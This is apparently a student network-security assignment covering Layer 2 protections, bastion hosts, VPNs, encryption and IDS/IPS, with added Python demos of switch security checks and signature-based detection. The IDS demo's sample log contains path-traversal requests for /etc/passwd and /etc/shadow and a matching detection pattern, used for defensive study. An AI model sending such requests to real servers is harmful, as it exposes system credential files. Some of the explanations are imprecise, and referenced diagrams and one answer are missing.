The APU main campus at Kuala Lumpur and APIIT at Sri Lanka require Layer 2 security to
have a secure LAN. To make the network safe and secure to use, there are several security
solutions which need to be applied (Telelink, 2013):

1. Port level Encryption

MAC Security (MACsec) is a protocol that provides encryption and protection of data traffic
between devices on a Layer 2 segment, for instance secure communication between an end
host and a switch, or between two switches in a network. Its functions and the protocol are
defined in the IEEE 802.1AE standard.

2. Network Authentication

Until the user is authenticated, only EAPOL traffic is allowed on a port. IEEE defines a
standard for port-level access control (802.1X).

3. Advanced L2 Security

To secure the upper-layer protocols, OSI Layer 2 security should be applied, because
attackers can attack Layer 2 functions and weaken them, so this must be addressed properly.
This security technique comes with features such as ARP Inspection and DHCP snooping.

4. Port-Level Security

This is a set of Layer 2 switch port security techniques with port-related features such as
storm control and limiting the maximum number of MAC addresses learned on a switch
port.
5. Device Security

Network devices, both software and hardware such as firewalls, routers, hubs and switches,
are the components that enable endpoint hosts to communicate. For proper communication
between servers and end hosts such as workstations, network device security ensures that the
device itself communicates safely and properly. It disables unused services, configures
management, and secures the management and control planes of a device. Device security
also makes sure that the device is physically secure from unauthorized access (Telelink,
2013).
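The features listed under Advanced L2 Security and Port-Level Security are decisions a switch makes for every inbound frame, and they build on each other: DHCP snooping trusts DHCP server messages only on trusted ports and records the leases it sees, Dynamic ARP Inspection drops ARP packets whose sender MAC/IP pair has no such binding, and port security caps the number of source MACs learned on an access port. The following added Python example (not the assignment's code and not a vendor implementation) models those three checks on a small switch; the port names, MAC and IP addresses are constructed, and each method returns a verdict so the logic can be checked offline.

```python
"""DHCP snooping, Dynamic ARP Inspection (DAI) and port security on a model switch.

Added illustrative example with constructed ports, MACs and IPs; not from the assignment.
"""
from dataclasses import dataclass, field


@dataclass
class Port:
    trusted: bool = False             # trusted = uplink / faces the real DHCP server
    max_macs: int = 1                 # port-security limit on learned source MACs
    learned: set = field(default_factory=set)
    shutdown: bool = False            # err-disabled after a port-security violation


class SecureSwitch:
    def __init__(self, ports):
        self.ports = ports            # name -> Port
        self.bindings = {}            # DHCP snooping table: (port, mac) -> ip

    # Port security runs on every inbound frame before anything else.
    def _port_security(self, port_name, src_mac):
        port = self.ports[port_name]
        if port.shutdown:
            return "drop"
        if src_mac in port.learned:
            return "forward"
        if len(port.learned) >= port.max_macs:
            port.shutdown = True      # violation mode "shutdown": port goes err-disabled
            return "violation"
        port.learned.add(src_mac)
        return "forward"

    # DHCP snooping: server messages only from trusted ports; ACKs populate the table.
    def dhcp_message(self, port_name, src_mac, kind, client_mac=None, client_ip=None):
        """kind: 'DISCOVER'/'REQUEST' from clients, 'OFFER'/'ACK' from servers."""
        verdict = self._port_security(port_name, src_mac)
        if verdict != "forward":
            return verdict
        if kind in ("OFFER", "ACK") and not self.ports[port_name].trusted:
            return "drop"             # rogue DHCP server on an access port
        if kind == "ACK":
            # Bind the lease to the untrusted port where the client's MAC was learned.
            for name, p in self.ports.items():
                if not p.trusted and client_mac in p.learned:
                    self.bindings[(name, client_mac)] = client_ip
        return "forward"

    # Dynamic ARP Inspection: sender MAC/IP must match a snooping binding on that port.
    def arp_message(self, port_name, src_mac, sender_mac, sender_ip):
        verdict = self._port_security(port_name, src_mac)
        if verdict != "forward":
            return verdict
        if self.ports[port_name].trusted:
            return "forward"          # DAI does not inspect trusted ports
        if sender_mac != src_mac:
            return "drop"             # ARP body disagrees with the Ethernet source
        if self.bindings.get((port_name, sender_mac)) != sender_ip:
            return "drop"             # no matching binding: spoofed sender IP
        return "forward"

    def plain_frame(self, port_name, src_mac):
        """Any other frame: only port security applies."""
        return self._port_security(port_name, src_mac)


if __name__ == "__main__":
    sw = SecureSwitch({"Gi0/1": Port(trusted=True, max_macs=64), "Fa0/2": Port(), "Fa0/3": Port()})
    sw.dhcp_message("Fa0/2", "aa:aa:aa:aa:aa:02", "DISCOVER")
    sw.dhcp_message("Gi0/1", "00:11:22:33:44:55", "ACK", "aa:aa:aa:aa:aa:02", "10.1.1.20")
    print(sw.arp_message("Fa0/2", "aa:aa:aa:aa:aa:02", "aa:aa:aa:aa:aa:02", "10.1.1.20"))  # forward
    print(sw.arp_message("Fa0/2", "aa:aa:aa:aa:aa:02", "aa:aa:aa:aa:aa:02", "10.1.1.1"))   # drop
```

The second ARP in the usage is the classic gateway-spoofing pattern DAI exists to stop: the host on Fa0/2 claims the gateway's address, but its snooping binding says 10.1.1.20, so the switch drops the packet at the access port instead of letting it poison other hosts' ARP caches.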
Question 8

A bastion host is typically accessed using SSH or RDP and is an instance located within a
public subnet. When remote connectivity is established through the bastion host, it acts as a
jump server: users log in to it with SSH or RDP and from there reach the other, private
subnets deeper within the network. The bastion host works as a bridge to private instances
via the Internet when the security groups and network ACLs are configured properly.
Normally bastion hosts are used when remote connectivity to private instances over the
public Internet is required. (Stuart, 2015)

Bastion hosts are best placed on a special network of their own, and it is recommended to
locate them on a network that does not carry any confidential traffic. Most Ethernet
interfaces can operate in “promiscuous mode”. In this mode, an interface connected to the
network can capture every packet on it, rather than only the packets addressed to its own
machine. Other types of network interface, such as FDDI, capture packets depending on the
network architecture, and sometimes they capture packets not specifically addressed to
them. (Docstore.mik.ua, 2002)

This capability is useful for network analysis, testing, and debugging. The downside is that
once a bastion host is compromised, it can snoop on this traffic, which is not what you want.
One way to approach the problem is not to put bastion hosts on the internal network but on
a perimeter network instead. Using a perimeter network with a packet-filtering router gives
more advantages: if a bastion host is compromised, the number of hosts and services the
compromised bastion host can access is reduced. If bastion hosts cannot be put on a
perimeter network, put them on a network that is not susceptible to snooping.
(Docstore.mik.ua, 2002)

Be careful, too, about the ability of network devices to snoop on the network: networking
devices should be protected at the same level as the computers. Many network devices
support remote administration; a Telnet server provided by a switch often offers a wide
variety of interfaces.
Steps in building a bastion host (Witter, 2017):

- Install NT and the application.
- Remove unnecessary network services.
- Disable unnecessary local services.
- Change the network configuration.
- Run setup.cmd.
- Test the application.
Question 9

Connectivity Solution from (Kuala Lumpur) to (Sri Lanka):

In this part, the question asks for a connection between the Kuala Lumpur office and the Sri
Lanka office. Several requirements must be met to implement this connection successfully,
such as having a router in each geographic area that can connect to a different network, as
well as additional features including a Virtual Private Network (VPN) and Secure Sockets
Layer (SSL).

Virtual Private Network (VPN):

VPN technology is based on a concept called a tunnel. The technology involves establishing
and maintaining logical network connections. In such a connection, the packet is simply
encapsulated in some base protocol standard, transmitted between the client and the server,
and finally de-encapsulated at the receiving end.

VPN Tunnelling Protocols:

Several different protocols have been implemented for these VPN tunnels, each appropriate
for different industries. Generally, these protocols are not compatible with each other; they
are chosen based on the required security level. The list below gives a brief introduction to
three common protocols used in VPN tunnelling technology.

Point-to-Point Tunnelling Protocol (PPTP):

This protocol is commonly known as the protocol associated with Microsoft products.
Although many experts believe this protocol is weak in terms of security, it is used by many
vendors as a compatible protocol.

Layer Two Tunnelling Protocol (L2TP):


L2F was the original competitor to PPTP in VPN tunnelling technology, a protocol
implemented primarily in Cisco products. In order to improve on L2F, the best features of it
and PPTP were combined and as the result L2TP protocol is created. Same as PPTP, L2TP
exists at the data link layer (Layer Two) in the OSI model.
Question 10

Data is not secure when transmitted through the internet. An unauthorized user may force
access to the connection between sender and receiver to steal or change the data. There are
techniques to protect the data so that hackers cannot learn the specific data. Some of the
security threats are eavesdropping, spyware and malicious attacks. [Sni17]

Types of Solution | Description

Secure Sockets Layer (SSL)
- Secure Sockets Layer is a security protocol that protects HTTP traffic as HTTPS.
- It encrypts the data while the user is sending information through the internet.
- For example, SSL can encrypt bank information such as the card CV numbers and password
  while a user purchases a product by debit or credit card on an online website such as
  Lazada, eBay or Amazon.
- The sensitive information cannot easily be learned by hackers.

Pretty Good Privacy (PGP)
- Pretty Good Privacy is a program to encrypt and decrypt email.
- It gives the email a high level of security to protect the details of the information.
- It works with two kinds of key: one public key and one private key.
- The sender encrypts the message and sends it to the receiver; after receiving the email, the
  receiver uses the private key to decrypt the data. [Mar14]

Secure Multi-Purpose Internet Mail Extensions (S/MIME)
- Secure Multi-Purpose Internet Mail Extensions is also a type of security feature that
  protects email, using RSA to secure the email.
- It encrypts the message with a public key so that the security becomes high performance.
  [Mar08]

SSH Secure Shell
- SSH Secure Shell is software for connecting a Windows PC to a remote Linux platform.
- It lets the user send sensitive information over the communication link, which provides
  encryption.
- Secure File Transfer Protocol is a security feature added to FTP to protect file
  processing. [SSH17]

Virtual Private Network (VPN): IPsec VPN, GRE VPN Tunnel
- A VPN provides encapsulation during the tunnel process. On its own it is still not secure
  enough to send the data, so there are two types of function that provide more security.
- IPsec VPN and GRE Tunnel VPN are the security features that give the VPN high security
  protection.
Question 11

The goal of implementing an Intrusion Detection System (IDS) is to track system activity and
monitor the system for suspicious activity. In the event of suspicious behaviour in the
system, the IDS alerts the system supervisor, and it may respond to the suspicious activity by
preventing the user from entering the system.

An Intrusion Prevention System (IPS) extends the IDS by adding the ability to block threats
after detecting them. There are two types of IPS signature:

1. Vulnerability-facing - Signatures that target the vulnerability in the system that is
   being attacked. These signatures allow the network to be protected from exploits that
   have not been seen in the network before.
2. Exploit-facing - Identify specific exploits by finding a match with an exploit-facing
   signature in the traffic stream.
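The difference between the two signature styles is easiest to see on sample traffic. The following is an added example, not code from the assignment or from any IDS product: a small Python inspector that runs both kinds of signature over constructed web-server log lines. The exploit-facing signature is a literal pattern for one previously seen request; the vulnerability-facing checks describe the weakness itself (a path that escapes the web root after decoding, or a path longer than the server's assumed buffer), so they also catch a re-encoded variant the literal pattern misses. The log format, the 256-byte limit and the IP addresses are all assumptions made for the demonstration.

```python
"""Exploit-facing versus vulnerability-facing signatures over sample web logs."""
import re
from urllib.parse import unquote

# Assumed log format: src_ip "METHOD path HTTP/x.y" status  (constructed for this demo)
LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d" (?P<status>\d{3})$'
)

# Exploit-facing: one literal pattern for a previously observed attack request.
# Any change in encoding or target file defeats it.
EXPLOIT_SIGNATURES = {
    "exploit-known-traversal": re.compile(r"/\.\./\.\./etc/passwd"),
}

# Vulnerability-facing: a limit of the protected server rather than an attack
# string.  Assumed value for the fictional server's path buffer.
MAX_SAFE_PATH_LEN = 256


def normalise_path(raw_path):
    """Percent-decode (bounded, to handle double encoding) and walk the
    path segments; return (decoded_path, escaped_webroot)."""
    path = raw_path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    depth, escaped = 0, False
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:          # climbed above the web root
                escaped = True
        elif seg not in ("", "."):
            depth += 1
    return path, escaped


def exploit_facing(raw_path):
    """Return the names of literal exploit signatures present in the raw path."""
    return [name for name, rx in EXPLOIT_SIGNATURES.items() if rx.search(raw_path)]


def vulnerability_facing(raw_path):
    """Return alerts describing the weakness being targeted, encoding-independent."""
    alerts = []
    normalised, escaped = normalise_path(raw_path)
    if escaped:
        alerts.append("vuln-path-escapes-webroot")
    if len(normalised) > MAX_SAFE_PATH_LEN:
        alerts.append("vuln-oversized-path")
    return alerts


def inspect_line(line):
    """Parse one log line and return a sorted list of alert names."""
    m = LOG_RE.match(line)
    if not m:
        return ["malformed-log-line"]
    path = m.group("path")
    return sorted(set(exploit_facing(path) + vulnerability_facing(path)))


# Constructed sample log: benign request, the known request, a re-encoded
# variant of it aimed at a different file, and an oversized path.
SAMPLE_LOG = [
    '10.0.0.5 "GET /index.html HTTP/1.1" 200',
    '10.0.0.9 "GET /images/../../etc/passwd HTTP/1.1" 404',
    '10.0.0.9 "GET /images/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 404',
    '10.0.0.12 "GET /' + "A" * 300 + ' HTTP/1.1" 414',
]


def run_demo(lines=SAMPLE_LOG):
    """Map each line index to the alerts raised for it."""
    return {i: inspect_line(line) for i, line in enumerate(lines)}


if __name__ == "__main__":
    for idx, alerts in run_demo().items():
        print(idx, alerts or "no alert")
```

Line 2 of the sample fires both signature types, but line 3 fires only the vulnerability-facing one: the literal signature never sees the percent-encoded dots, while the normalising check does. That is the practical meaning of "protected from exploits that have not been seen before".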

The diagram below explains the process of implementing an Intrusion Detection System
(IDS) in the company system. Notice that there are two IDS systems, one inside the
network and the other outside. The IDS devices keep in constant contact with the Monitor
Servers and inform them of any change in the network infrastructure.

The diagram below explains the difference between IDS and IPS:

There are many ways of implementing an Intrusion Detection System (IDS) that can secure the
company environment against threat breaches between the Kuala Lumpur office and the Sri Lanka
office; this is one of them. The IPsec configuration is shown below:
Question 12
Question 13

Solution [Sys16]

a. Prepare Cisco Packet Tracer.
b. Install the Package Installation Envelope (PIE).
c. Activate the PIE for the security software to implement SSL encryption.
d. Before using Secure Sockets Layer, generate the RSA or DSA key pairs and enrol with a CA.
e. Make sure the CA has been obtained for the router key.
f. The SSL server supports the Advanced Encryption Standard (AES) algorithm, which
   includes several key sizes: 128 bits, 192 bits and 256 bits.

The main purpose is to configure SSL encryption between the two routers in Sri Lanka and
Kuala Lumpur.

A Certificate Authority (CA) manages the certificate requests and issuance for the IPsec
network devices. It provides centralized key management for the IPsec network devices. The
point-to-point connection between the routers has to carry messages that are encrypted. The
sender can use the DSA algorithm to protect the message: DSA provides public key
cryptography, while RSA provides one public and one private key.

The process of implementing Secure Sockets Layer needs to use an application, either the
HTTP server or the XML management agent, to perform the configuration of SSL encryption.

Example of SSL Configuration

Steps

First: crypto key generate rsa general-keys (generate the RSA key pair)

Second: configure

Third: domain ipv4 host host-name IP-address

Fourth: crypto ca trustpoint myca (select a name for the CA that issues the certificates)

Fifth: enrollment url CA-URL (the HTTP URL of the certificate authority)

Sixth: commit

Seventh: crypto ca authenticate ca-name (the CA name whose authentication is checked)

Final: show crypto ca certificates (show the information on the CA certificates)

Conclusion:
The implementation of the SSL configuration is complete and the data will be protected by encryption.
Figure: Example of Configuration Process
[Cli16]

Conclusion
The goal of this assignment is to provide security against external threats to the DMZ and
the internal network. Many features have been implemented to achieve this goal, such as
providing password encryption at each layer of the network, creating VLAN switch port
security for the Layer 2 switches, connecting to the Internet using embedded IPsec and ISAKMP
VPNs, creating an access list, and providing the bastion host as an application proxy. In general,
the security of the network connectivity between A and B is improved after implementation. We
recommend further ways to protect the company's environment and improve the overall security
of the network: the VPN tunnel, successful implementation of Layer 2 security with BPDU Guard,
and creating another server that can support other protocols (such as TFTP and AAA
authentication) to improve the security of network allocation.

Reference

Banffcyber.com. (2017). Best Practices to address the issue of Web Defacement | BanffCyber.
[online] Available at: https://www.banffcyber.com/best-practices-to-address-the-issue-of-
web-defacement/ [Accessed 25 Sep. 2017].

Byrd, J. (2009). Five Critical Steps for Configuring an SMTP Mail Server. [online] Available
at: http://www.logicalhalf.com/2010/03/five-critical-steps-for-configuring.html [Accessed 1
October 2012].

Cobb, M. (2012). What is DMZ (demilitarized zone)? - Definition from WhatIs.com. [online]
SearchSecurity. Available at: http://searchsecurity.techtarget.com/definition/DMZ
[Accessed 2 October 2017].

Cisco (2017). Cisco ASA 5500-X Series with FirePOWER Services. [online] Cisco. Available at:
https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~stickynav=1
[Accessed 2 October 2017].

Docstore.mik.ua. (2002). Locating Bastion Hosts on the Network (Building Internet
Firewalls, 2nd Edition). [online] Available at:
https://docstore.mik.ua/orelly/networking_2ndEd/fire/ch10_05.htm [Accessed 30 Sep. 2017].

Kumar, C. (2017). 7 Website Defacement Monitoring Tools for Better Security. [online] Geek
Flare. Available at: https://geekflare.com/website-defacement-monitoring/ [Accessed 25 Sep. 2017].

Learn Ethical Hacking and Penetration Testing Online. (2016). 6 Ways to Hack or deface
Websites Online. [online] Available at: https://www.hackingloops.com/6-ways-to-hack-or-
deface-websites-online/ [Accessed 25 Sep. 2017].

McKeag, L. (2004). Building a security DMZ. [online] Available at:
http://howto.techworld.com/security/322/building-a-security-dmz/ [Accessed 24 September 2012].

Leach, S. (2013). Four ways to defend against DDoS attacks. [online] Network World.
Available at: https://www.networkworld.com/article/2170051/security/tech-primers-four-ways-
to-defend-against-ddos-attacks.html [Accessed 2 October 2017].

Stuart, S. (2015). AWS Security: Bastion Host, NAT instances and VPC Peering. [online]
Cloud Academy Blog. Available at: https://cloudacademy.com/blog/aws-bastion-host-nat-
instances-vpc-peering-security/ [Accessed 30 Sep. 2017].

Witter, C. (2017). Build a Bastion Host. [online] Windowsitpro.com. Available at:
http://windowsitpro.com/networking/build-bastion-host [Accessed 30 Sep. 2017].

Wilson, T. (2012). Securing Networks Access List Implementation on Cisco Routers. [online]
Available at: http://www.trainsignal.com/blog/access-control-list-implementation-on-cisco-
routers [Accessed 20 September 2012].

Packet Tracer Network. (2016). Clientless SSL VPN. [online] Available at:
http://www.packettracernetwork.com/labs/lab16-asa-webvpn.html [Accessed 22 July 2016].

Rouse, M. (2008). S/MIME (Secure Multi-Purpose Internet Mail Extensions). [online] TechTarget.
Available at: http://whatis.techtarget.com/definition/S-MIME-Secure-Multi-Purpose-Internet-
Mail-Extensions

Rouse, M. (2014). Pretty Good Privacy (PGP). [online] TechTarget. Available at:
http://searchsecurity.techtarget.com/definition/Pretty-Good-Privacy

Baylor University. (2017). Sniffing (network wiretap, sniffer) FAQ. [online] Available at:
http://cs.baylor.edu/~donahoo/tools/sniffer/sniffingFAQ.htm [Accessed 30 September 2017].

VCU Technology Services. (2017). SSH Secure Shell/SFTP. [online] Available at:
https://ts.vcu.edu/software-center/general-purpose/ssh-secure-shellsftp/ [Accessed 30 September 2017].

Cisco. (2016). System Security Configuration Guide for the Cisco CRS Router: Implement Secure
Socket Layer. [online] Available at:
https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r4-
2/security/configuration/guide/b_syssec_cg42crs/b_syssec_cg42crs_chapter_01010.html#ref_1027265_sysseccg_12
[Accessed 7 September 2016].

Toncar.cz. (2013). VoIP Protocols: Introducing H.323. [online] [Accessed 2 Oct. 2017].

SearchNetworking. (2015). What Is H.323? - Definition From WhatIs.com. [online]
[Accessed 15 Sep. 2017].

TechTarget. (2014). SMTP (Simple Mail Transfer Protocol). [online]

Powerbiz. (2011). How to Set Up an Internal SMTP Service for Windows Server 2012
Essentials. [online]

Lifewire. (2012). Introduction To Intrusion Detection Systems (IDS). [online]

Interactivesys. (2015). Intrusion Detection. [online]

Excitingip. (2016). IPS. [online]

TechTarget. (2013). Virtual Private Network. [online]

TechTarget. (2015). Layer Two Tunneling Protocol (L2TP). [online]

Leahy, E. (2011). Implement IPv4 tunneling and Generic Routing Encapsulation (GRE). [online]
The World of Networking. Available at:
http://ericleahy.com/index.php/implement-ipv4-tunneling-and-generic-routing-encapsulation-gre/
[Accessed 16 Aug. 2011].

Allied Telesis. (2017). Chapter 19 Generic Routing Encapsulation. [online] Available at:
https://www.allied-telesis.co.jp/support/list/router/ar300/m027400b_pl3_990902/GRE.pdf
[Accessed 22 Sep. 2017].

Arush. (2016). How to Configure GRE Tunnel in Cisco Router. [online] IP With Ease. Available at:
http://www.ipwithease.com/how-to-configure-gre-tunnel-in-cisco-router/ [Accessed 28 October 2016].

Beal, V. (2017). The 7 Layers of the OSI Model. [online] Webopedia. Available at:
http://www.webopedia.com/quick_ref/OSI_Layers.asp [Accessed 31 January 2017].

Cisco. (2017). Cisco IOS GRE Decapsulation Vulnerability. [online] Available at:
https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20060906-gre
[Accessed 3 October 2017].

HP. (2017). Configuring a Tunnel with Generic Routing Encapsulation. [online] Advanced
Management Config Guide. Available at:
ftp://ftp.hp.com/pub/networking/software/SR7000dl-Adv-C11-GRE_Tunnel-Nov2006.pdf
[Accessed 3 October 2017].

Cisco. (2017). Configuring IP Tunnels. [online] Available at:
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/sw/4_2/nx-os/interfaces/configuration/guide/if_nxos/if_tunnel.pdf
[Accessed 3 October 2017].

NetworkLessons. (2017). Encrypted GRE Tunnel with IPSEC. [online] Available at:
https://networklessons.com/cisco/ccnp-route/encrypted-gre-tunnel-with-ipsec/ [Accessed 2 October 2017].

CCIE The Beginning. (2008). GRE (Generic Routing Encapsulation): Point-to-point & multipoint GRE.
[online] Available at: https://cciethebeginning.wordpress.com/2008/06/29/gre-generic-
routing-encapsulation-point-to-point-multipoint-gre/ [Accessed 29 June 2008].

Allied Telesis. (2017). GRE Feature Overview and Configuration Guide. [online] Available at:
https://www.alliedtelesis.com/sites/default/files/gre_feature_config_guide.pdf [Accessed 22 Sep. 2017].

Ciscohite. (2013). GRE vs IPSEC. [online] Available at: https://ciscohite.wordpress.com/tag/gre-vs-ipsec/
[Accessed 15 April 2013].

Juniper Networks. (2012). Understanding Generic Routing Encapsulation. [online] Available at:
http://www.juniper.net/documentation/en_US/junos12.3/topics/concept/gre-tunnel-services.html
[Accessed 10 Dec. 2012].

Rouse, M. (2011). Generic Routing Encapsulation (GRE). [online] TechTarget. Available at:
http://searchenterprisewan.techtarget.com/definition/Generic-routing-encapsulation-GRE

Apprize. (2017). Troubleshooting Basic IPv4/IPv6 Routing and GRE Tunnels. [online] CCNP.
Available at: http://apprize.info/network/ccnp_2/13.html [Accessed 3 October 2017].

X4B. (2017). What is Generic Routing Encapsulation (GRE) and how does it differ from IP-in-IP?
[online] Available at: https://www.x4b.net/kb/GREvsIPIP [Accessed 22 Sep. 2017].

Beal, V. (2015). VPN - Virtual Private Network. [online] Webopedia. Available at:
http://www.webopedia.com/TERM/V/VPN.html [Accessed 2 October 2017].

Bradley, T. (2016). Introduction to Intrusion Detection Systems (IDS). [online] Lifewire.
Available at: https://www.lifewire.com/introduction-to-intrusion-detection-systems-ids-2486799
[Accessed 27 September 2017].

Cisco. (2012). How Virtual Private Networks Work. [online] Available at:
http://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-protocols/14106-how-vpn-works.html
[Accessed 6 October 2017].

Rebelo, L. (2013). How to Configure VoIP Packet Tracer. [Film] s.l.: s.n.

Khan, I. U. (2016). Improve SSL/TLS Performance with These 4 Simple Tips. [online] Cloudways.
Available at: https://www.cloudways.com/blog/improve-ssl-tls-performance/ [Accessed 24 September 2017].

Packetizer. (2017). H.323 versus SIP: A Comparison. [online] Available at:
https://www.packetizer.com/ipmc/h323_vs_sip/

VoipThink. (2017). H.323 Example. [online] Available at:
http://www.en.voipforo.com/H323/H323_example.php

VoIP Insights. (2010). VoIP History. [online] Available at:
http://www.voipinsights.com/voip_history.html
